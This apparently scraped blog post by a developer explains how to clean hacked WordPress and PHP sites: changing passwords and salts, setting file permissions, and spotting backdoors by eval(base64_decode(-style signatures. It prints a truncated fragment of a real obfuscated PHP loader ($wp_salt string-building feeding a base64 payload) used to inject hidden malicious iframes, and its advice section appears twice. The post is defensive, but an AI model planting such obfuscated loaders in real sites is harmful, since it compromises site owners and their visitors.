Figuring out how the rats are getting into the barn is always tough (my apologies to rats for the comparison). Most hosting services help by checking access logs, looking at file ownership etc. So ask your hosting provider for any information they can provide...

What I often see is, hackers exploiting vulnerabilities in older versions of softwares. Make sure all your softwares, CMS/Themes/Plugins are up to date.

Compromised Passwords:

Start by doing a scan of your PC and make sure there are no Malwares capturing your IDs/Passwords. Change ALL your passwords, especially the FTP ones. Never store/save your passwords in your FTP client, use SFTP if available. On WordPress sites, you need to change your Security/Secret Keys as well.

File/Folder Permissions:

Hackers exploit file permissions to continue getting access to your servers, even after you change your Passwords. So you need to check the permissions strictly. I usually set Files to 644 and Folders to 755.

Backdoors:

A backdoor is usually a php file hidden away somewhere within the system files, '/cgi-bin/' is a popular place. This php file is not a part of your site and it will contain a bunch of base64_encoded stuff. You would see lines of php codes that start with eval(base64_decode(' or eval(gzinflate(base64_decode(' or eval(gzuncompress(base64_decode(' followed by a long string of seemingly random characters. I wrote an article with some tips on how to locate a backdoor on a site...

Hope this helps, lets nuke those hackers... 🤘🏻

.'v',$wp_salt[7].$wp_salt[9].$wp_salt[22].$wp_salt[3].$wp_salt[1].$wp_salt[13].$wp_salt[14].$wp_salt[20].$wp_salt[0].$wp_salt[8].$wp_salt[3].$wp_salt[22].$wp_salt[16].$wp_salt[7].$wp_salt[1].$wp_salt[15].$wp_salt[22].$wp_salt[19].$wp_salt[7].$wp_salt[17].$wp_salt[21].$wp_salt[11].$wp_salt[4].$wp_salt[7].$wp_salt[5].$wp_salt[2].$wp_salt[4].$wp_salt[7].$wp_salt[1].$wp_salt[10].$wp_salt[9].$wp_salt[18].$wp_salt[18].$wp_salt[18].$wp_salt[12]);$wp_add_filter('FZi3zoaMsYQvx7YoyEmWC3LOmeYIXnLO6erP93c0IK1mdvYZyisb/l1/7VQN2VH+O8/2ksD+ryh/c1H++19i2qLCeiliH4ApgAVMQYau3F32r98uNi45nQSIJNUEGSFKAIBXDd9B06LQ0LORUKbf3KKV jQeHMHgGOqoqyoNqLNYHyk/XnJ73um2b38HtRLjZ86P3WOLwh...... [snipped a bit] .......7PaEHk/TSye7MrKqpM1lUCzAjX5NwpW5X803CpCvkTWBYP7paOaRsiz+vr/BOf1F3TchA+ewJGrYPfrzliW6r984Z KT3qdN58EVdA6ZFNrgjTjevu6aExuKs8UE9pUnOYVVWwXWrV4lSe6zyxzR2zSYyCNrXdYEgLd//+9+//vOf//z3/wE=');
On many sites, hackers use these obfuscated PHP codes…


to write obfuscated JavaScripts…


to add malicious iframes to the pages on the site…


This is another example of an obfuscated script used to insert an iframe but the php is “double” encoded…


When we plug that long string of characters into a de​coder we get…


While it is starting to be a little more readable, we still have another long base​64 encoded string. Plugging that into the de​coder again, we can now see the JavaScript that is appearing in the pages of the site…


A “de-obfuscation” of the JavaScript and the purpose of the code now becomes clear…


When the JavaScript is executed by the user’s browser, we get a hidden iframe loading malicious content from another site…


Always follow up with some basic security checks!

Figuring out how the rats are getting into the barn is always tough (my apologies to rats for the comparison). Most hosting services help by checking access logs, looking at file ownership etc. So ask your hosting provider for any information they can provide…

What I often see is, hackers exploiting vulnerabilities in older versions of softwares. Make sure all your softwares, CMS/Themes/Plugins are up to date.

Compromised Passwords:

Start by doing a scan of your PC and make sure there are no Malwares capturing your IDs/Passwords. Change ALL your passwords, especially the FTP ones. Never store/save your passwords in your FTP client, use SFTP if available. On WordPress sites, you need to change your Security/Secret Keys as well.

File/Folder Permissions:

Hackers exploit file permissions to continue getting access to your servers, even after you change your Passwords. So you need to check the permissions strictly. I usually set Files to 644 and Folders to 755.

Backdoors:

A backdoor is usually a php file hidden away somewhere within the system files, ‘/cgi-bin/’ is a popular place. This php file is not a part of your site and it will contain a bunch of base64_encoded stuff. You would see lines of php codes that start with eval(base64_decode(‘ or eval(gzinflate(base64_decode(‘ or eval(gzuncompress(base64_decode(‘ followed by a long string of seemingly random characters. I wrote an article with some tips on how to locate a backdoor on a site…

Hope this helps, lets nuke those hackers… 🤘🏻

About Syed

Syed ShariefiGame Developer. Musician. Entrepreneur. Reader. Certified Problem Solver. Troublemaker. Evil Analyst. Movie Fanatic. Pro Gamer. Software Engineer.

Syed Shariefi (Shuvo) © 2022. All rights reserved...